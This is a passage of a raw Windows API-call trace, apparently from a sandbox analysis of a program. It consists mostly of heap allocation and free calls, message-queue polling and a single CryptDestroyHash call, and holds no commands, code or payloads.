returned 0x2e54d88 [0215.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0215.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0215.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0215.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0215.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0215.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0215.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0215.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0215.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0215.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0215.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0215.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0215.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0215.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0215.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0215.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0215.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0215.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0215.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0215.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0215.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0215.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0215.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0215.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0215.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0215.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0215.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0215.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0215.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0215.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0215.300] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.300] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.301] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0215.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b28 [0215.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0215.301] CryptDestroyHash (hHash=0xa87490) returned 1 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0215.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0215.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0215.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0215.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0215.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0215.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0215.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0215.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0215.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0215.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0215.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0215.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0215.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0215.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0215.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: 